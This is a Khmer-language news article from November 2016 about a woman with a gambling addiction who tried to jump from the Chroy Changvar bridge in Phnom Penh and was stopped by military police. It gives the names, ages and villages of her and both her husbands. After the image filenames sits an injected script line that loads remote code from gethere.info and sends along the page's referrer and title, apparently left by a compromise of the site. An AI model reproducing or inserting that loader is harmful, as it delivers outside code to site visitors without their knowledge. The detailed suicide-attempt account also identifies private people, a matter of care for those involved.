ព្រឹតិ្តការណ៍ថ្មីៗ

ស្ត្រីម្នាក់ញៀនល្បែងខ្លាំងពេកមកដេកជាមួយប្តីដើម ដើម្បីរកលុយស្រង់ដើម​ តែមិនបាន​ ស្រាប់តែមកលោតទឹកសម្លាប់ខ្លួនតែម្តង

2 ឆ្នាំ មុន 2 tnn_admin

ភ្នំពេញ៖ ស្ត្រីម្នាក់វ័យ៣៥ឆ្នាំម្នាក់បានដើរផងរត់ផងយំផង បំណងមកលោតទឹកនៅស្ពានជ្រោយចង្វារ ដើម្បីបញ្ចប់ជីវិត តែបានកងរាជអាវុធហត្ថខណ្ឌ និងប្រជាការពារខណ្ឌជ្រោយចង្វារ ដែលប្រចាំការនៅគោលដៅគល់ស្ពាននោះ បានចាប់ឃាត់សួរនាំ ទើបដឹងថាដោយសារតែគាត់ញៀនល្បែងខ្លាំងពេកគ្មានលុយស្រង់ដើម គ្មានលុយយកទៅសងប្តីក្រោយ និងដោយសារ មកដេកផ្ទះសំណាក់ជាមួយប្តីមុនលួងលោមឱ្យរកលុយមិនបាន ព្រោះតែយកលុយពីប្តីក្រោយទៅលេងល្បែងកាសុីណូនៅបាវិតចាញ់ខ្ទេចគ្មានសល់។ ហេតុការណ៍ភ្ញាក់ផ្អើលនេះ បានកើតឡើងនៅវេលាម៉ោង១និង១០នាទីរសៀល ថ្ងៃទី១៧ ខែវិច្ឆិកា ឆ្នាំ២០១៦ នៅចំណុចស្ពានជ្រោយចង្វារថ្មី ភូមិដើមគរ សង្កាត់ជ្រោយចង្វារ ខណ្ឌជ្រោយចង្វារ រាជធានីភ្នំពេញ។

ប្រភពព័ត៌មានបានអោយដឹងថា ស្ត្រីដែលញៀនល្បែងនោះមានឈ្មោះ ហេង រី អាយុ ៣៥ឆ្នាំ មុខរបរ នៅផ្ទះ ស្នាក់នៅភូមិស្វាយតាណាក់ ឃុំស្វាយរមៀត ស្រុកខ្សាច់កណ្តាល ខេត្តកណ្តាល ចំណែកឯប្តីក្រោយមានឈ្មោះ សៀ គល់ អាយុ៣៤ឆ្នាំ មុខរបរ ជាងដែក រស់នៅជាមួយគ្នា រីឯប្តីមុនឈ្មោះ ភុំ អ៊ុន អាយុ៥៨ឆ្នាំ មុខរបរអតីតមន្ត្រីពន្ធដានៅបាវិត រស់ភូមិកំពង់ភ្នំ ឃុំលើកដែក ខេត្តកណ្តាល។

ស្ត្រីញៀនល្បែងបានអោយដឹងថា ខ្លួនបានយកប្តីមុនកាលពី ១០ឆ្នាំមុន ហើយចំណងដៃស្នេហ៍រវាងពួកគាត់ទាំង២នាក់ទទួលបានកូន១ ហើយការរស់ក៏មិនសូវចុះសម្រុងនឹងគ្នា ដោយសារតែប្តីមុនមិនបាននាំគ្នារកសុីអីទេ គិតតែនាំលេងល្បែង ទីបំផុតក៏រលាយទ្រព្យសម្បិត្តិហិនហោចអស់គ្មានសល់។ ក្រោយមកពួកយើងទាំង ២នាក់ក៏ចាប់ផ្តើមបែងចែកផ្លូវគ្នាកាលពី ៨ខែមុន ហើយនាងក៏មានប្តី១ទៀតដែលរស់នៅស្រុកជាមួយគ្នា ដោយប្តីក្រោយគាត់ប្រកបរបរជាជាងដែក។

ស្ត្រីខាងលើបានបន្តទៀតថា កាលពីមុនបុណ្យអុំទូក ខ្លួនបានយកលុយប្តីជាង៣០០ដុល្លារទៅលេងល្បែងនៅកាសុីណូក្រុងបាវិត ហើយក៏ចាញ់ខ្ទេចអស់គ្មានសល់ មិនដឹងបានលុយឯណាយកទៅសងប្តីក្រោយ ក៏ទូរស័ព្ទហៅប្តីមុនទៅដេកផ្ទះសំណាក់ ដើម្បីលួងលោមប្តីមុនឱ្យរកលុយទៅស្រង់ដើម ដោយឱ្យប្តីមុនយកម៉ូតូរបស់កូនទៅបញ្ចាំតែកូនមិននៅ ទើបគ្មានលុយអោយនាង ហើយនាងខឹងក៏រត់ទៅលោតទឹកសម្លាប់ខ្លួន តែត្រូវប្តីតាមឃាត់ដោយឱ្យម៉ូតូឌុបនាងទៅដាក់បេនឡាន ដើម្បីជិះឡានទៅផ្ទះវិញ តែនាងមិនទៅរត់មកលោតទឹកម្តងទៀត ក៏ត្រូវកងរាជអាវុធហត្ថខណ្ឌ និងប្រជាការពារខណ្ឌជ្រោយចង្វារ ឃាត់យកមកប៉ុស្តិ៍នគរបាលរដ្ឋបាលជ្រោយចង្វារ ហើយណែនាំឱ្យសាច់ញាតិមកយកត្រឡប់ទៅផ្ទះវិញ៕ អត្ថបទ និងរូបភាពៈ ៣៧

img-20161117-wa0129 img-20161117-wa0130 img-20161117-wa0127 img-20161117-wa0123 img-20161117-wa0120s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ